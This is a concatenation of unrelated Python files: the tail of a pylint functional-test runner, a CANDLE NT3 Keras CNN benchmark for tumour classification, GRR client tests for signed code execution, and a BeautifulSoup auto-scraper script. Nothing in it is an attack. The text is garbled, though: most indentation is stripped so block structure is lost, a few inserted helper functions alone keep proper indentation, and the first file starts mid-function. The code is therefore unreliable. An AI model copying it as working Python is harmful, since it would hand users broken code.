line = i + 1 + int(line)
else:
line = int(line)
version = match.group('version')
op = match.group('op')
if version:
required = parse_python_version(version)
if not _OPERATORS[op](sys.version_info, required):
continue
for msg_id in match.group('msgs').split(','):
messages[line, msg_id.strip()] += 1
return messages
def multiset_difference(left_op, right_op):
"""Takes two multisets and compares them.
A multiset is a dict with the cardinality of the key as the value.
:param left_op: The expected entries.
:param right_op: Actual entries.
:returns: The two multisets of missing and unexpected messages.
"""
missing = left_op.copy()
missing.subtract(right_op)
unexpected = {}
for key, value in list(six.iteritems(missing)):
if value <= 0:
missing.pop(key)
if value < 0:
unexpected[key] = -value
return missing, unexpected
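# Worked example for multiset_difference(): one expected occurrence is missing
# from the received messages, and one received message was never expected.
def _example_multiset_difference():
    expected = collections.Counter({(1, 'undefined-variable'): 2})
    received = collections.Counter({(1, 'undefined-variable'): 1,
                                    (3, 'unused-import'): 1})
    missing, unexpected = multiset_difference(expected, received)
    assert missing == {(1, 'undefined-variable'): 1}
    assert unexpected == {(3, 'unused-import'): 1}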
class LintModuleTest(unittest.TestCase):
maxDiff = None
def __init__(self, test_file):
super(LintModuleTest, self).__init__('_runTest')
test_reporter = TestReporter()
self._linter = lint.PyLinter()
self._linter.set_reporter(test_reporter)
self._linter.config.persistent = 0
checkers.initialize(self._linter)
self._linter.disable('I')
try:
self._linter.read_config_file(test_file.option_file)
self._linter.load_config_file()
except NoFileError:
pass
self._test_file = test_file
def setUp(self):
if (sys.version_info < self._test_file.options['min_pyver']
or sys.version_info >= self._test_file.options['max_pyver']):
self.skipTest(
'Test cannot run with Python %s.' % (sys.version.split(' ')[0],))
missing = []
for req in self._test_file.options['requires']:
try:
__import__(req)
except ImportError:
missing.append(req)
if missing:
self.skipTest('Requires %s to be present.' % (','.join(missing),))
if self._test_file.options['except_implementations']:
implementations = [
item.strip() for item in
self._test_file.options['except_implementations'].split(",")
]
implementation = platform.python_implementation()
if implementation in implementations:
self.skipTest(
'Test cannot run with Python implementation %r'
% (implementation, ))
def __str__(self):
return "%s (%s.%s)" % (self._test_file.base, self.__class__.__module__,
self.__class__.__name__)
def _open_expected_file(self):
return open(self._test_file.expected_output)
def _open_source_file(self):
if self._test_file.base == "invalid_encoded_data":
return open(self._test_file.source)
else:
return io.open(self._test_file.source, encoding="utf8")
def _get_expected(self):
with self._open_source_file() as fobj:
expected_msgs = get_expected_messages(fobj)
if expected_msgs:
with self._open_expected_file() as fobj:
expected_output_lines = parse_expected_output(fobj)
else:
expected_output_lines = []
return expected_msgs, expected_output_lines
def _get_received(self):
messages = self._linter.reporter.messages
messages.sort(key=lambda m: (m.line, m.symbol, m.msg))
received_msgs = collections.Counter()
received_output_lines = []
for msg in messages:
received_msgs[msg.line, msg.symbol] += 1
received_output_lines.append(OutputLine.from_msg(msg))
return received_msgs, received_output_lines
def _runTest(self):
self._linter.check([self._test_file.module])
expected_messages, expected_text = self._get_expected()
received_messages, received_text = self._get_received()
if expected_messages != received_messages:
msg = ['Wrong results for file "%s":' % (self._test_file.base)]
missing, unexpected = multiset_difference(expected_messages,
received_messages)
            if missing:
                msg.append('\nExpected in testdata:')
                msg.extend(' %3d: %s' % entry for entry in sorted(missing))
            if unexpected:
                msg.append('\nUnexpected in testdata:')
                msg.extend(' %3d: %s' % entry for entry in sorted(unexpected))
self.fail('\n'.join(msg))
self._check_output_text(expected_messages, expected_text, received_text)
def _split_lines(self, expected_messages, lines):
emitted, omitted = [], []
for msg in lines:
if (msg[1], msg[0]) in expected_messages:
emitted.append(msg)
else:
omitted.append(msg)
return emitted, omitted
def _check_output_text(self, expected_messages, expected_lines,
received_lines):
self.assertSequenceEqual(
self._split_lines(expected_messages, expected_lines)[0],
received_lines)
class LintModuleOutputUpdate(LintModuleTest):
def _open_expected_file(self):
try:
return super(LintModuleOutputUpdate, self)._open_expected_file()
except IOError:
return io.StringIO()
def _check_output_text(self, expected_messages, expected_lines,
received_lines):
if not expected_messages:
return
emitted, remaining = self._split_lines(expected_messages, expected_lines)
if emitted != received_lines:
remaining.extend(received_lines)
remaining.sort(key=lambda m: (m[1], m[0], m[3]))
with open(self._test_file.expected_output, 'w') as fobj:
writer = csv.writer(fobj, dialect='test')
for line in remaining:
writer.writerow(line.to_csv())
def suite():
input_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'functional')
suite = unittest.TestSuite()
for fname in os.listdir(input_dir):
if fname != '__init__.py' and fname.endswith('.py'):
test_file = TestFile(input_dir, fname)
if UPDATE:
suite.addTest(LintModuleOutputUpdate(test_file))
else:
suite.addTest(LintModuleTest(test_file))
return suite
def load_tests(loader, tests, pattern):
return suite()
if __name__=='__main__':
if '-u' in sys.argv:
UPDATE = True
sys.argv.remove('-u')
unittest.main(defaultTest='suite')
|
|
from __future__ import print_function
import pandas as pd
import numpy as np
import os
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Dense, Dropout, Activation, Conv1D, MaxPooling1D, Flatten, LocallyConnected1D
from tensorflow.keras.models import Sequential, model_from_json, model_from_yaml
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.callbacks import CSVLogger, ReduceLROnPlateau
from sklearn.preprocessing import MaxAbsScaler
import nt3 as bmk
import candle
def initialize_parameters(default_model='nt3_default_model.txt'):
# Build benchmark object
nt3Bmk = bmk.BenchmarkNT3(
bmk.file_path,
default_model,
'keras',
prog='nt3_baseline',
desc='1D CNN to classify RNA sequence data in normal or tumor classes')
# Initialize parameters
gParameters = candle.finalize_parameters(nt3Bmk)
return gParameters
def load_data(train_path, test_path, gParameters):
print('Loading data...')
df_train = (pd.read_csv(train_path, header=None).values).astype('float32')
df_test = (pd.read_csv(test_path, header=None).values).astype('float32')
print('done')
print('df_train shape:', df_train.shape)
print('df_test shape:', df_test.shape)
seqlen = df_train.shape[1]
df_y_train = df_train[:, 0].astype('int')
df_y_test = df_test[:, 0].astype('int')
# only training set has noise
Y_train = to_categorical(df_y_train, gParameters['classes'])
Y_test = to_categorical(df_y_test, gParameters['classes'])
df_x_train = df_train[:, 1:seqlen].astype(np.float32)
df_x_test = df_test[:, 1:seqlen].astype(np.float32)
X_train = df_x_train
X_test = df_x_test
scaler = MaxAbsScaler()
mat = np.concatenate((X_train, X_test), axis=0)
mat = scaler.fit_transform(mat)
X_train = mat[:X_train.shape[0], :]
X_test = mat[X_train.shape[0]:, :]
    # TODO: Add better names for the noise boolean; make a feature for both RNA-seq and label noise together
# check if noise is on (this is for label)
if gParameters['add_noise']:
# check if we want noise correlated with a feature
if gParameters['noise_correlated']:
Y_train, y_train_noise_gen = candle.label_flip_correlated(Y_train,
gParameters['label_noise'], X_train,
gParameters['feature_col'],
gParameters['feature_threshold'])
# else add uncorrelated noise
else:
Y_train, y_train_noise_gen = candle.label_flip(Y_train, gParameters['label_noise'])
# check if noise is on for RNA-seq data
elif gParameters['noise_gaussian']:
X_train = candle.add_gaussian_noise(X_train, 0, gParameters['std_dev'])
return X_train, Y_train, X_test, Y_test
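# A minimal sketch of the joint-scaling step in load_data() above: train and
# test are stacked, one MaxAbsScaler is fitted on the combined matrix, and the
# halves are split back out so both sets share the same per-feature scale.
def _example_joint_scaling():
    x_train = np.array([[1.0, -4.0], [2.0, 2.0]])
    x_test = np.array([[4.0, 1.0]])
    mat = MaxAbsScaler().fit_transform(np.concatenate((x_train, x_test), axis=0))
    return mat[:x_train.shape[0], :], mat[x_train.shape[0]:, :]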
def run(gParameters):
file_train = gParameters['train_data']
file_test = gParameters['test_data']
url = gParameters['data_url']
train_file = candle.get_file(file_train, url + file_train, cache_subdir='Pilot1')
test_file = candle.get_file(file_test, url + file_test, cache_subdir='Pilot1')
model = Sequential()
initial_epoch = 0
best_metric_last = None
X_train, Y_train, X_test, Y_test = load_data(train_file, test_file, gParameters)
print('X_train shape:', X_train.shape)
print('X_test shape:', X_test.shape)
print('Y_train shape:', Y_train.shape)
print('Y_test shape:', Y_test.shape)
x_train_len = X_train.shape[1]
# this reshaping is critical for the Conv1D to work
X_train = np.expand_dims(X_train, axis=2)
X_test = np.expand_dims(X_test, axis=2)
print('X_train shape:', X_train.shape)
print('X_test shape:', X_test.shape)
layer_list = list(range(0, len(gParameters['conv']), 3))
    for i in layer_list:
filters = gParameters['conv'][i]
filter_len = gParameters['conv'][i + 1]
stride = gParameters['conv'][i + 2]
print(int(i / 3), filters, filter_len, stride)
if gParameters['pool']:
pool_list = gParameters['pool']
            if not isinstance(pool_list, list):
                # accept a tuple or a single scalar pool size
                pool_list = list(pool_list) if hasattr(pool_list, '__iter__') else [pool_list] * len(layer_list)
if filters <= 0 or filter_len <= 0 or stride <= 0:
break
if 'locally_connected' in gParameters:
model.add(LocallyConnected1D(filters, filter_len, strides=stride, padding='valid', input_shape=(x_train_len, 1)))
else:
# input layer
if i == 0:
model.add(Conv1D(filters=filters, kernel_size=filter_len, strides=stride, padding='valid', input_shape=(x_train_len, 1)))
else:
model.add(Conv1D(filters=filters, kernel_size=filter_len, strides=stride, padding='valid'))
model.add(Activation(gParameters['activation']))
if gParameters['pool']:
model.add(MaxPooling1D(pool_size=pool_list[int(i / 3)]))
model.add(Flatten())
for layer in gParameters['dense']:
if layer:
model.add(Dense(layer))
model.add(Activation(gParameters['activation']))
if gParameters['dropout']:
model.add(Dropout(gParameters['dropout']))
model.add(Dense(gParameters['classes']))
model.add(Activation(gParameters['out_activation']))
J = candle.restart(gParameters, model)
if J is not None:
initial_epoch = J['epoch']
best_metric_last = J['best_metric_last']
gParameters['ckpt_best_metric_last'] = best_metric_last
print('initial_epoch: %i' % initial_epoch)
ckpt = candle.CandleCheckpointCallback(gParameters,
verbose=False)
# Reference case
# model.add(Conv1D(filters=128, kernel_size=20, strides=1, padding='valid', input_shape=(P, 1)))
# model.add(Activation('relu'))
# model.add(MaxPooling1D(pool_size=1))
# model.add(Conv1D(filters=128, kernel_size=10, strides=1, padding='valid'))
# model.add(Activation('relu'))
# model.add(MaxPooling1D(pool_size=10))
# model.add(Flatten())
# model.add(Dense(200))
# model.add(Activation('relu'))
# model.add(Dropout(0.1))
# model.add(Dense(20))
# model.add(Activation('relu'))
# model.add(Dropout(0.1))
# model.add(Dense(CLASSES))
# model.add(Activation('softmax'))
kerasDefaults = candle.keras_default_config()
# Define optimizer
optimizer = candle.build_optimizer(gParameters['optimizer'],
gParameters['learning_rate'],
kerasDefaults)
model.summary()
model.compile(loss=gParameters['loss'],
optimizer=optimizer,
metrics=[gParameters['metrics']])
output_dir = gParameters['output_dir']
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# calculate trainable and non-trainable params
gParameters.update(candle.compute_trainable_params(model))
# set up a bunch of callbacks to do work during model training..
model_name = gParameters['model_name']
# path = '{}/{}.autosave.model.h5'.format(output_dir, model_name)
# checkpointer = ModelCheckpoint(filepath=path, verbose=1, save_weights_only=False, save_best_only=True)
csv_logger = CSVLogger('{}/training.log'.format(output_dir))
    reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='auto', min_delta=0.0001, cooldown=0, min_lr=0)
candleRemoteMonitor = candle.CandleRemoteMonitor(params=gParameters)
timeoutMonitor = candle.TerminateOnTimeOut(gParameters['timeout'])
history = model.fit(X_train, Y_train,
batch_size=gParameters['batch_size'],
epochs=gParameters['epochs'],
initial_epoch=initial_epoch,
verbose=1,
validation_data=(X_test, Y_test),
callbacks=[csv_logger, reduce_lr, candleRemoteMonitor, timeoutMonitor,
ckpt])
score = model.evaluate(X_test, Y_test, verbose=0)
if False:
print('Test score:', score[0])
print('Test accuracy:', score[1])
# serialize model to JSON
model_json = model.to_json()
with open("{}/{}.model.json".format(output_dir, model_name), "w") as json_file:
json_file.write(model_json)
# serialize model to YAML
model_yaml = model.to_yaml()
with open("{}/{}.model.yaml".format(output_dir, model_name), "w") as yaml_file:
yaml_file.write(model_yaml)
# serialize weights to HDF5
model.save_weights("{}/{}.weights.h5".format(output_dir, model_name))
print("Saved model to disk")
# load json and create model
json_file = open('{}/{}.model.json'.format(output_dir, model_name), 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model_json = model_from_json(loaded_model_json)
# load yaml and create model
yaml_file = open('{}/{}.model.yaml'.format(output_dir, model_name), 'r')
loaded_model_yaml = yaml_file.read()
yaml_file.close()
loaded_model_yaml = model_from_yaml(loaded_model_yaml)
# load weights into new model
loaded_model_json.load_weights('{}/{}.weights.h5'.format(output_dir, model_name))
print("Loaded json model from disk")
# evaluate json loaded model on test data
loaded_model_json.compile(loss=gParameters['loss'],
optimizer=gParameters['optimizer'],
metrics=[gParameters['metrics']])
score_json = loaded_model_json.evaluate(X_test, Y_test, verbose=0)
print('json Test score:', score_json[0])
print('json Test accuracy:', score_json[1])
print("json %s: %.2f%%" % (loaded_model_json.metrics_names[1], score_json[1] * 100))
# load weights into new model
loaded_model_yaml.load_weights('{}/{}.weights.h5'.format(output_dir, model_name))
print("Loaded yaml model from disk")
# evaluate loaded model on test data
loaded_model_yaml.compile(loss=gParameters['loss'],
optimizer=gParameters['optimizer'],
metrics=[gParameters['metrics']])
score_yaml = loaded_model_yaml.evaluate(X_test, Y_test, verbose=0)
print('yaml Test score:', score_yaml[0])
print('yaml Test accuracy:', score_yaml[1])
print("yaml %s: %.2f%%" % (loaded_model_yaml.metrics_names[1], score_yaml[1] * 100))
return history
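# The 'conv' hyperparameter consumed in run() is a flat list read three at a
# time as (filters, kernel_size, stride) triplets. An illustration with
# hypothetical values (matching the reference case in the comments above):
def _example_conv_spec():
    conv = [128, 20, 1, 128, 10, 1]
    return [tuple(conv[i:i + 3]) for i in range(0, len(conv), 3)]
    # -> [(128, 20, 1), (128, 10, 1)]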
def main():
gParameters = initialize_parameters()
run(gParameters)
if __name__ == '__main__':
main()
try:
K.clear_session()
except AttributeError: # theano does not have this function
pass
|
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test client standard actions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import hashlib
import io
import sys
from absl import app
import mock
from grr_response_client.client_actions import standard
from grr_response_core import config
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import client_action as rdf_client_action
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_core.lib.util import temp
from grr.test_lib import action_mocks
from grr.test_lib import client_test_lib
from grr.test_lib import filesystem_test_lib
from grr.test_lib import test_lib
class TestExecutePython(client_test_lib.EmptyActionTest):
"""Test the client execute actions."""
def setUp(self):
super(TestExecutePython, self).setUp()
self.signing_key = config.CONFIG[
"PrivateKeys.executable_signing_private_key"]
def testExecutePython(self):
"""Test the basic ExecutePython action."""
utils.TEST_VAL = "original"
python_code = "utils.TEST_VAL = 'modified'"
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertGreater(result.time_used, 0)
self.assertEqual(result.return_val, "")
self.assertEqual(utils.TEST_VAL, "modified")
def testExecutePythonEnvironment(self):
"""Test the basic ExecutePython action."""
python_code = """
import io
import uu
import binascii
def decode(encoded):
# Use the import (uu) inside a function. This will fail if the environment
# for exec is not set up properly.
i = io.BytesIO(s)
o = io.BytesIO()
uu.decode(i, o)
return o.getvalue()
s = "626567696e20363636202d0a2c3226354c3b265c4035565d523b2630410a200a656e640a"
s = binascii.unhexlify(s.encode("ascii"))
magic_return_str = decode(s)
"""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertGreater(result.time_used, 0)
self.assertEqual(result.return_val, "Hello World!")
def testStdoutHooking(self):
python_code = """
def f(n):
print("F called: %s" % n)
print("Calling f.")
f(1)
print("Done.")
"""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertGreater(result.time_used, 0)
self.assertEqual(result.return_val, "Calling f.\nF called: 1\nDone.\n")
def testProgress(self):
python_code = """
def f():
# This should also work inside a function.
Progress()
f()
Progress()
print("Done.")
"""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertGreater(result.time_used, 0)
self.assertEqual(result.return_val, "Done.\n")
def testExecuteModifiedPython(self):
"""Test that rejects invalid ExecutePython action."""
utils.TEST_VAL = "original"
python_code = "utils.TEST_VAL = 'modified'"
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
# Modify the data so the signature does not match.
signed_blob.data = b"utils.TEST_VAL = 'notmodified'"
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
# Should raise since the code has been modified.
self.assertRaises(rdf_crypto.VerificationError, self.RunAction,
standard.ExecutePython, request)
    # Let's also adjust the hash.
signed_blob.digest = hashlib.sha256(signed_blob.data).digest()
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
self.assertRaises(rdf_crypto.VerificationError, self.RunAction,
standard.ExecutePython, request)
# Make sure the code never ran.
self.assertEqual(utils.TEST_VAL, "original")
def testExecuteBrokenPython(self):
"""Test broken code raises back to the original flow."""
python_code = "raise ValueError"
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
self.assertRaises(ValueError, self.RunAction, standard.ExecutePython,
request)
def testExecuteBinary(self):
"""Test the basic ExecuteBinaryCommand action."""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(open("/bin/ls", "rb").read(), self.signing_key)
filepath = __file__.encode(sys.getfilesystemencoding())
request = rdf_client_action.ExecuteBinaryRequest(
executable=signed_blob, args=[filepath], write_path="ablob")
result = self.RunAction(standard.ExecuteBinaryCommand, request)[0]
self.assertGreater(result.time_used, 0)
self.assertIn(filepath, result.stdout)
def testReturnVals(self):
"""Test return values."""
python_code = "magic_return_str = 'return string'"
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertEqual(result.return_val, "return string")
def testWrongKey(self):
"""Test return values."""
python_code = "print 'test'"
# Generate a test valid RSA key that isn't the real one.
signing_key = rdf_crypto.RSAPrivateKey.GenerateKey(2048, 65537)
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), signing_key)
request = rdf_client_action.ExecutePythonRequest(python_code=signed_blob)
self.assertRaises(rdf_crypto.VerificationError, self.RunAction,
standard.ExecutePython, request)
def testArgs(self):
"""Test passing arguments."""
utils.TEST_VAL = "original"
python_code = """
magic_return_str = py_args['test']
utils.TEST_VAL = py_args[43]
"""
signed_blob = rdf_crypto.SignedBlob()
signed_blob.Sign(python_code.encode("utf-8"), self.signing_key)
pdict = rdf_protodict.Dict({"test": "dict_arg", 43: "dict_arg2"})
request = rdf_client_action.ExecutePythonRequest(
python_code=signed_blob, py_args=pdict)
result = self.RunAction(standard.ExecutePython, request)[0]
self.assertEqual(result.return_val, "dict_arg")
self.assertEqual(utils.TEST_VAL, "dict_arg2")
class GetFileStatTest(client_test_lib.EmptyActionTest):
def testStatSize(self):
with temp.AutoTempFilePath() as temp_filepath:
with io.open(temp_filepath, "wb") as temp_file:
temp_file.write(b"123456")
pathspec = rdf_paths.PathSpec(
path=temp_filepath, pathtype=rdf_paths.PathSpec.PathType.OS)
request = rdf_client_action.GetFileStatRequest(pathspec=pathspec)
results = self.RunAction(standard.GetFileStat, request)
self.assertLen(results, 1)
self.assertEqual(results[0].st_size, 6)
def testStatExtAttrsEnabled(self):
with temp.AutoTempFilePath() as temp_filepath:
filesystem_test_lib.SetExtAttr(
temp_filepath, name="user.foo", value="bar")
pathspec = rdf_paths.PathSpec(
path=temp_filepath, pathtype=rdf_paths.PathSpec.PathType.OS)
request = rdf_client_action.GetFileStatRequest(
pathspec=pathspec, collect_ext_attrs=True)
results = self.RunAction(standard.GetFileStat, request)
self.assertLen(results, 1)
self.assertLen(results[0].ext_attrs, 1)
self.assertEqual(results[0].ext_attrs[0].name, b"user.foo")
self.assertEqual(results[0].ext_attrs[0].value, b"bar")
def testStatExtAttrsDisabled(self):
with temp.AutoTempFilePath() as temp_filepath:
filesystem_test_lib.SetExtAttr(
temp_filepath, name="user.foo", value="bar")
pathspec = rdf_paths.PathSpec(
path=temp_filepath, pathtype=rdf_paths.PathSpec.PathType.OS)
request = rdf_client_action.GetFileStatRequest(
pathspec=pathspec, collect_ext_attrs=False)
results = self.RunAction(standard.GetFileStat, request)
self.assertLen(results, 1)
self.assertEmpty(results[0].ext_attrs)
class TestNetworkByteLimits(client_test_lib.EmptyActionTest):
"""Test TransferBuffer network byte limits."""
def setUp(self):
super(TestNetworkByteLimits, self).setUp()
pathspec = rdf_paths.PathSpec(
path="/nothing", pathtype=rdf_paths.PathSpec.PathType.OS)
self.buffer_ref = rdf_client.BufferReference(pathspec=pathspec, length=5000)
self.data = b"X" * 500
stubber = mock.patch.object(standard.vfs, "ReadVFS", return_value=self.data)
stubber.start()
self.addCleanup(stubber.stop)
self.transfer_buf = action_mocks.ActionMock(standard.TransferBuffer)
def testTransferNetworkByteLimitError(self):
message = rdf_flows.GrrMessage(
name="TransferBuffer",
payload=self.buffer_ref,
network_bytes_limit=300,
generate_task_id=True)
# We just get a client alert and a status message back.
responses = self.transfer_buf.HandleMessage(message)
client_alert = responses[0].payload
self.assertIn("Network limit exceeded", str(client_alert))
status = responses[1].payload
self.assertIn("Action exceeded network send limit", str(status.backtrace))
self.assertEqual(status.status,
rdf_flows.GrrStatus.ReturnedStatus.NETWORK_LIMIT_EXCEEDED)
def testTransferNetworkByteLimit(self):
message = rdf_flows.GrrMessage(
name="TransferBuffer",
payload=self.buffer_ref,
network_bytes_limit=900,
generate_task_id=True)
responses = self.transfer_buf.HandleMessage(message)
for response in responses:
if isinstance(response, rdf_flows.GrrStatus):
self.assertEqual(response.payload.status,
rdf_flows.GrrStatus.ReturnedStatus.OK)
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
|
import re
import sys
sys.path.append("/Users/pascal/GDrive/sky_package/sky/")
from utils import *
from training import *
from findLeaf import *
from bs4 import BeautifulSoup
def uniqifyOverTraining(list_of_lists):
uniques = []
for x in list_of_lists[0]:
if all([bool(x in y) for y in list_of_lists]):
uniques.append(x)
return uniques
def findParentIdentifiers(x, soup, nLevel=3):
parents = []
try:
for parent_attrs in [parent.attrs for parent in x.parents][:nLevel]:
if len(soup.findAll(**{"attrs" : parent_attrs})) == 1:
parents.append({"attrs" : parent_attrs})
for parent_attrs in [{"name" : parent.name} for parent in x.parents][:nLevel]:
if len(soup.findAll(**{"name" : parent.name})) == 1:
parents.append({"name" : parent.name})
except:
pass
return parents
def findSharedKeyValues(training, trainingLeafs):
case_options = []
for soup, case in zip(training.soups, trainingLeafs):
options = []
for leaf in case:
options.extend(findParentIdentifiers(leaf, soup))
options.extend(findByTag(leaf, soup))
case_options.append(options)
shared_options = []
for option in case_options[0]:
if all([bool(option in case) for case in case_options]):
shared_options.append(option)
return shared_options
def findByTag(node, soup, nLevel=5):
goodTags = []
tags = []
tags.extend([x.name for x in node.parents][:nLevel])
try:
tags.append(node.name)
except:
pass
for tag in tags:
if len(soup.findAll(tag)) == 1:
goodTags.append({"name" : tag})
return goodTags
def secondLevelDown(soup, outcome, unique_keys):
solution = []
num = 0
for unique_key in unique_keys:
num += 1
#attempt = soup
        #for key in unique_key:  # I think what I meant here is that partial matches could also be done
        attempt = soup.find(**unique_key)
        if attempt is None:
            continue
        if attempt.text == outcome:
solution.append([unique_key, BeautifulSoup.get_text])
if stripReasonableWhite(attempt.text) == stripReasonableWhite(outcome):
solution.append([unique_key, BeautifulSoup.get_text, stripReasonableWhite])
splitting = splitN(attempt.text, outcome)
if splitting:
for splitable in splitting:
solution.append([unique_key, BeautifulSoup.get_text, splitSolution(splitable)])
return solution
def stripReasonableWhite(x):
return re.sub(r"\s+", " ", x).strip()
def splitN(txt, outcome):
# consider splitting to get result
txt = stripReasonableWhite(txt)
outcome = stripReasonableWhite(outcome)
splitables = set(txt.replace(outcome, '', 1)) - set(' ')
options = set()
for s in splitables:
for i, x in enumerate(txt.split(s)):
if stripReasonableWhite(x) == stripReasonableWhite(outcome):
options.add((s, i))
return options
def splitSolution(how):
def solution(txt):
return txt.split(how[0])[how[1]]
return solution
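# Worked example for splitN()/splitSolution(): splitN searches for a separator
# character and index such that splitting the scraped text recovers the target,
# and splitSolution turns one such (separator, index) pair into a callable.
def _example_splitN():
    options = splitN("25|euro", "25")        # {('|', 0)}
    split_fn = splitSolution(next(iter(options)))
    return split_fn("25|euro")               # '25'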
def asNumeric(x):
return re.sub("[^0-9]", "", x)
def applySolutionChain(solution, x):
for sol in solution:
if isinstance(sol, dict):
x = x.find(**sol)
else:
x = sol(x)
return x
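# applySolutionChain() treats a solution as a pipeline: dict steps become
# find() keyword arguments, anything else is called on the current value.
# A sketch on a hand-made soup (mirrors how solutions are stored above):
def _example_solution_chain():
    soup = BeautifulSoup("<html><body><h1>25|euro</h1></body></html>")
    chain = [{"name": "h1"}, BeautifulSoup.get_text, splitSolution(('|', 0))]
    return applySolutionChain(chain, soup)   # '25'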
def buildSolution(training):
res = findLeaf(training)
print("len(res)", len(res))
x = findSharedKeyValues(training, res)
print("len(shared)", len(x))
solutions = secondLevelDown(training.soups[0], training.targets[0], x)
print("len(solutions)", len(solutions))
return solutions
def testAutoScraperSolutions(autoScraper, training, verbose=False):
    num = 0
    any_success = False
    for solution in autoScraper:
        num += 1
        if all([applySolutionChain(solution, soup) == target for soup, target in zip(training.soups, training.targets)]):
            result = "SUCCESSFUL"
            any_success = True
        else:
            result = "UNSUCCESSFUL"
        if verbose:
            print("Scraper method: ", num, " was ", result)
    return any_success
def tryUniqueID(c, sp):
return len(sp.findAll(c.name, attrs=c.attrs)) == 1
def buildNewSolution(tr):
childs = []
num = 0
options = []
for soup, target in zip(tr.soups, tr.targets):
        print('num', num)
        num += 1
for c in soup.findChildren():
try:
if c.name not in ['body', 'html']:
if target in c.text:
childs.append([c, len(c.text)])
except:
pass
tmp = []
for i,x in enumerate(childs[::-1]):
if tryUniqueID(x[0], soup):
attrs = x[0].attrs
attrs['name'] = x[0].name
attrs = {'attrs' : attrs}
if x[0].text == target:
tmp.append((attrs, BeautifulSoup.get_text))
elif stripReasonableWhite(x[0].text) == stripReasonableWhite(target):
tmp.append((attrs, BeautifulSoup.get_text, stripReasonableWhite))
elif splitN(x[0].text, target):
for splitable in splitN(x[0].text, target):
tmp.append((attrs, BeautifulSoup.get_text, splitSolution(splitable)))
else:
print(len([y for y in x[0].children]))
else:
print('not unique', len([y for y in x[0].children]))
options.append(tmp)
good_options = []
if options:
for x in options[0]:
if all(x in y for y in options[1:]):
good_options.append(x)
return good_options
#testAutoScraperSolutions(buildSolution(tr), tr, False)
# tr1 = Training("marktplaats-testcase1", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# tr2 = Training("nieuwsdumper-testcase1", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# tr3 = Training("nieuwsdumper-testcase2", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# tr4 = Training("bouwmaterieel-testcase1", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# tr5 = Training("marktplaats-testcase2", "/Users/pascal/GDrive/sky/sky/tests/")
# tr5.addLinks(["http://www.marktplaats.nl/a/telecommunicatie/mobiele-telefoons-samsung/m861980349-hdc-galaxy-s5-nieuw-in-doos.html?c=a2384ef0ece270f44503df9f8598c624&previousPage=lr",
# "http://www.marktplaats.nl/a/telecommunicatie/mobiele-telefoons-samsung/m862001039-samsung-galaxy-s3-neo.html?c=a2384ef0ece270f44503df9f8598c624&previousPage=lr", "http://www.marktplaats.nl/a/telecommunicatie/mobiele-telefoons-toebehoren-en-onderdelen/m862001036-iphone-3-4-4s-usb-oplaad-snoer.html?c=a2384ef0ece270f44503df9f8598c624&previousPage=lr"])
# tr5.viewAll()
# tr6 = Training("pypi-author", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
# links = ["http://www.forbes.com/sites/rogerkay/2014/11/10/sparkcognition-meets-ibms-watson-starts-conversation/"]
# import justext
# url = "http://www.forbes.com/sites/rogerkay/2014/11/10/sparkcognition-meets-ibms-watson-starts-conversation/"
# html = urllib.urlopen(url).read()
# paragraphs = justext.justext(html, justext.get_stoplist('English'))
# title = "SparkCognition Meets IBM's Watson, Starts Conversation"
# res = []
# for x in paragraphs:
# if not x.is_boilerplate:
# res.append(x.text)
# newres = []
# for x in res[res.index(title)+1:]:
# newres.append(x)
# for x in newres:
# print(x.encode("ascii", "ignore"))
# res = findLeaf(tr3)
# x = findSharedKeyValues(tr3, res)
# secondLevelDown(tr3.soups[0], tr3.targets[0], x)
tr1 = Training("marktplaats-testcase1", "/Users/pascal/GDrive/sky_package/sky/tests/").load()
from collections import Counter
class SoupStats(object):
    def __init__(self, soup):
        self.soup = soup
        self.counter = Counter()
        for child in soup.findChildren():
            for atts in child.attrs.items():
                k, v = atts
